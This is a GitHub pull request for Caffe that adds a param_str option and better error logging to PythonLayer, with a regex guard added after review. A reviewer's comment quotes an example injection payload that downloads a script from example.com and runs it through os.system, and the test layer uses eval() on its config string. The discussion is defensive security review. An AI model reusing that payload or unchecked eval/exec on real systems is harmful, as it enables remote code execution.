Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Python] PythonLayer takes parameters by string and better exception handling #2001

Closed
wants to merge 5 commits into from
Closed
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion Makefile
Original file line number Diff line number Diff line change
Expand Up @@ -164,7 +164,7 @@ endif
LIBRARIES += glog gflags protobuf leveldb snappy \
lmdb boost_system hdf5_hl hdf5 m \
opencv_core opencv_highgui opencv_imgproc
PYTHON_LIBRARIES := boost_python python2.7
PYTHON_LIBRARIES := boost_python python2.7 boost_regex
WARNINGS := -Wall -Wno-sign-compare

##############################
Expand Down
1 change: 1 addition & 0 deletions Makefile.config.example
Original file line number Diff line number Diff line change
Expand Up @@ -58,6 +58,7 @@ PYTHON_LIB := /usr/lib
# PYTHON_LIB := $(ANACONDA_HOME)/lib

# Uncomment to support layers written in Python (will link against Python libs)
# This will require an additional dependency boost_regex provided by boost.
# WITH_PYTHON_LAYER := 1

# Whatever else you find you need goes here.
Expand Down
5 changes: 5 additions & 0 deletions cmake/Dependencies.cmake
Original file line number Diff line number Diff line change
Expand Up @@ -131,6 +131,11 @@ if(BUILD_python)
add_definitions(-DWITH_PYTHON_LAYER)
include_directories(SYSTEM ${PYTHON_INCLUDE_DIRS} ${NUMPY_INCLUDE_DIR} ${Boost_INCLUDE_DIRS})
list(APPEND Caffe_LINKER_LIBS ${PYTHON_LIBRARIES} ${Boost_LIBRARIES})
find_package(Boost 1.46 COMPONENTS regex)
if (Boost_REGEX_FOUND)
include_directories(SYSTEM ${Boost_INCLUDE_DIRS})
list(APPEND Caffe_LINKER_LIBS ${Boost_LIBRARIES})
endif()
endif()
endif()
endif()
Expand Down
43 changes: 28 additions & 15 deletions include/caffe/python_layer.hpp
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,8 @@
#define CAFFE_PYTHON_LAYER_HPP_

#include <boost/python.hpp>

#include <string>
#include <vector>

#include "caffe/layer.hpp"
Expand All @@ -10,29 +12,43 @@ namespace bp = boost::python;

namespace caffe {

#define PYTHON_LAYER_ERROR() { \
PyObject *petype, *pevalue, *petrace; \
PyErr_Fetch(&petype, &pevalue, &petrace); \
bp::object etype(bp::handle<>(bp::borrowed(petype))); \
bp::object evalue(bp::handle<>(bp::borrowed(bp::allow_null(pevalue)))); \
bp::object etrace(bp::handle<>(bp::borrowed(bp::allow_null(petrace)))); \
bp::object sio(bp::import("StringIO").attr("StringIO")()); \
bp::import("traceback").attr("print_exception")( \
etype, evalue, etrace, bp::object(), sio); \
LOG(INFO) << bp::extract<string>(sio.attr("getvalue")())(); \
PyErr_Restore(petype, pevalue, petrace); \
throw; \
}

template <typename Dtype>
class PythonLayer : public Layer<Dtype> {
public:
PythonLayer(PyObject* self, const LayerParameter& param)
: Layer<Dtype>(param), self_(self) { }
: Layer<Dtype>(param), self_(bp::handle<>(bp::borrowed(self))) { }

virtual void LayerSetUp(const vector<Blob<Dtype>*>& bottom,
const vector<Blob<Dtype>*>& top) {
try {
bp::call_method<bp::object>(self_, "setup", bottom, top);
self_.attr("param_str_") = bp::str(
this->layer_param_.python_param().param_str());
self_.attr("setup")(bottom, top);
} catch (bp::error_already_set) {
PyErr_Print();
throw;
PYTHON_LAYER_ERROR();
}
}

virtual void Reshape(const vector<Blob<Dtype>*>& bottom,
const vector<Blob<Dtype>*>& top) {
try {
bp::call_method<bp::object>(self_, "reshape", bottom, top);
self_.attr("reshape")(bottom, top);
} catch (bp::error_already_set) {
PyErr_Print();
throw;
PYTHON_LAYER_ERROR();
}
}

Expand All @@ -42,25 +58,22 @@ class PythonLayer : public Layer<Dtype> {
virtual void Forward_cpu(const vector<Blob<Dtype>*>& bottom,
const vector<Blob<Dtype>*>& top) {
try {
bp::call_method<bp::object>(self_, "forward", bottom, top);
self_.attr("forward")(bottom, top);
} catch (bp::error_already_set) {
PyErr_Print();
throw;
PYTHON_LAYER_ERROR();
}
}
virtual void Backward_cpu(const vector<Blob<Dtype>*>& top,
const vector<bool>& propagate_down, const vector<Blob<Dtype>*>& bottom) {
try {
bp::call_method<bp::object>(self_, "backward", top, propagate_down,
bottom);
self_.attr("backward")(top, propagate_down, bottom);
} catch (bp::error_already_set) {
PyErr_Print();
throw;
PYTHON_LAYER_ERROR();
}
}

private:
PyObject* self_;
bp::object self_;
};

} // namespace caffe
Expand Down
85 changes: 85 additions & 0 deletions python/caffe/test/test_python_layer_with_param_str.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,85 @@
import unittest
import tempfile

import os

import caffe

class ElemwiseScalarLayer(caffe.Layer):
"""A layer that just multiplies by ten"""

def setup(self, bottom, top):
self.layer_params_ = eval(self.param_str_)
self.value_ = self.layer_params_['value']
if self.layer_params_['op'].lower() == 'add':
self._forward = self._forward_add
self._backward = self._backward_add
elif self.layer_params_['op'].lower() == 'mul':
self._forward = self._forward_mul
self._backward = self._backward_mul
else:
raise ValueError("Unknown operation type: '%s'"
% self.layer_params_['op'].lower())
def _forward_add(self, bottom, top):
top[0].data[...] = bottom[0].data + self.value_
def _backward_add(self, bottom, propagate_down, top):
bottom[0].diff[...] = top[0].diff
def _forward_mul(self, bottom, top):
top[0].data[...] = bottom[0].data * self.value_
def _backward_mul(self, bottom, propagate_down, top):
bottom[0].diff[...] = top[0].diff * self.value_
def reshape(self, bottom, top):
top[0].reshape(bottom[0].num, bottom[0].channels, bottom[0].height,
bottom[0].width)
def forward(self, bottom, top):
self._forward(bottom, top)
def backward(self, top, propagate_down, bottom):
self._backward(bottom, propagate_down, top)


def python_net_file():
f = tempfile.NamedTemporaryFile(delete=False)
f.write(r"""name: 'pythonnet' force_backward: true
input: 'data' input_dim: 10 input_dim: 9 input_dim: 8 input_dim: 7
layer { type: 'Python' name: 'one' bottom: 'data' top: 'one'
python_param {
module: 'test_python_layer_with_param_str' layer: 'ElemwiseScalarLayer'
param_str: "{'op': 'add', 'value': 2}" } }
layer { type: 'Python' name: 'two' bottom: 'one' top: 'two'
python_param {
module: 'test_python_layer_with_param_str' layer: 'ElemwiseScalarLayer'
param_str: "{'op': 'mul', 'value': 3}" } }
layer { type: 'Python' name: 'three' bottom: 'two' top: 'three'
python_param {
module: 'test_python_layer_with_param_str' layer: 'ElemwiseScalarLayer'
param_str: "{'op': 'add', 'value': 10}" } }""")
f.close()
return f.name

class TestLayerWithParam(unittest.TestCase):
def setUp(self):
net_file = python_net_file()
self.net = caffe.Net(net_file, caffe.TRAIN)
os.remove(net_file)

def test_forward(self):
x = 8
self.net.blobs['data'].data[...] = x
self.net.forward()
for y in self.net.blobs['three'].data.flat:
self.assertEqual(y, (x + 2) * 3 + 10)

def test_backward(self):
x = 7
self.net.blobs['three'].diff[...] = x
self.net.backward()
for y in self.net.blobs['data'].diff.flat:
self.assertEqual(y, 3 * x)

def test_reshape(self):
s = 4
self.net.blobs['data'].reshape(s, s, s, s)
self.net.forward()
for blob in self.net.blobs.itervalues():
for d in blob.data.shape:
self.assertEqual(s, d)
1 change: 1 addition & 0 deletions scripts/travis/travis_install.sh
Original file line number Diff line number Diff line change
Expand Up @@ -15,6 +15,7 @@ apt-get install \
python-dev python-numpy \
libleveldb-dev libsnappy-dev libopencv-dev \
libboost-dev libboost-system-dev libboost-python-dev libboost-thread-dev \
libboost-regex-dev \
libprotobuf-dev protobuf-compiler \
libatlas-dev libatlas-base-dev \
libhdf5-serial-dev libgflags-dev libgoogle-glog-dev \
Expand Down
20 changes: 16 additions & 4 deletions src/caffe/layer_factory.cpp
Original file line number Diff line number Diff line change
Expand Up @@ -6,6 +6,7 @@
#include "caffe/vision_layers.hpp"

#ifdef WITH_PYTHON_LAYER
#include <boost/regex.hpp>
#include "caffe/python_layer.hpp"
#endif

Expand Down Expand Up @@ -160,14 +161,25 @@ REGISTER_LAYER_CREATOR(TanH, GetTanHLayer);
#ifdef WITH_PYTHON_LAYER
template <typename Dtype>
shared_ptr<Layer<Dtype> > GetPythonLayer(const LayerParameter& param) {
string module_name = param.python_param().module();
string layer_name = param.python_param().layer();
// Check injection. This allows nested import.
boost::regex expression("[a-zA-Z_][a-zA-Z0-9_]*"
"(\\.[a-zA-Z_][a-zA-Z0-9_]*)*");
CHECK(boost::regex_match(module_name, expression))
<< "Module name is invalid: " << module_name;
CHECK(boost::regex_match(layer_name, expression))
<< "Layer name is invalid: " << layer_name;
Py_Initialize();
try {
bp::object module = bp::import(param.python_param().module().c_str());
bp::object layer = module.attr(param.python_param().layer().c_str())(param);
bp::object globals = bp::import("__main__").attr("__dict__");
bp::exec(("import " + module_name).c_str(), globals, globals);
bp::object layer_class = bp::eval((module_name + "." + layer_name).c_str(),

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Isn't it dangerous to call eval and exec on user strings that haven't been checked for commands? That is, we should first validate that module_name and layer_name both match the regex ^[a-zA-Z_][a-zA-Z0-9_]*$. Without this check, injection attacks like this one are possible:

python_param {
   ...
   module: 'os; os.system("wget example.com/malicious.sh"); os.system("bash malicious.sh")'
}

I understand that for most use cases, this isn't a concern, but I think it's good practice to avoid introducing unnecessary vulnerabilities.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Agreed with @seanbell that if we're going to eval/execit's worth doing a check like the one he suggests. Is it necessary to switch away from bp::import though? I'm not sure why it's needed, is it to load __dict__ first? Could param_str just be a string, and then Python layer writers could eval it as a dict on their own if they want it to take a dict?

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@tnarihi explains the use of eval/exec in one of the commit messages ( tnarihi@64a2b04 )

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Ah, thanks, missed that.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for commenting. I also agree with @seanbell . To avoid injections would be nice. I will modify it soon using boost regex. Thanks for giving me the regex pattern, @seanbell ! I will use this.

globals, globals);
bp::object layer = layer_class(param);
return bp::extract<shared_ptr<PythonLayer<Dtype> > >(layer)();
} catch (bp::error_already_set) {
PyErr_Print();
throw;
PYTHON_LAYER_ERROR();
}
}

Expand Down
6 changes: 6 additions & 0 deletions src/caffe/proto/caffe.proto
Original file line number Diff line number Diff line change
Expand Up @@ -664,6 +664,12 @@ message PowerParameter {
message PythonParameter {
optional string module = 1;
optional string layer = 2;
// This value is set to the attribute `param_str_` of your custom
// `PythonLayer` object in Python before calling `setup()` method. This could
// be a number, a string, a dictionary in Python dict format or JSON etc. You
// may parse this string in `setup` method and use them in `forward` and
// `backward`.
optional string param_str = 3 [default = ''];
}

// Message that stores parameters used by ReLULayer
Expand Down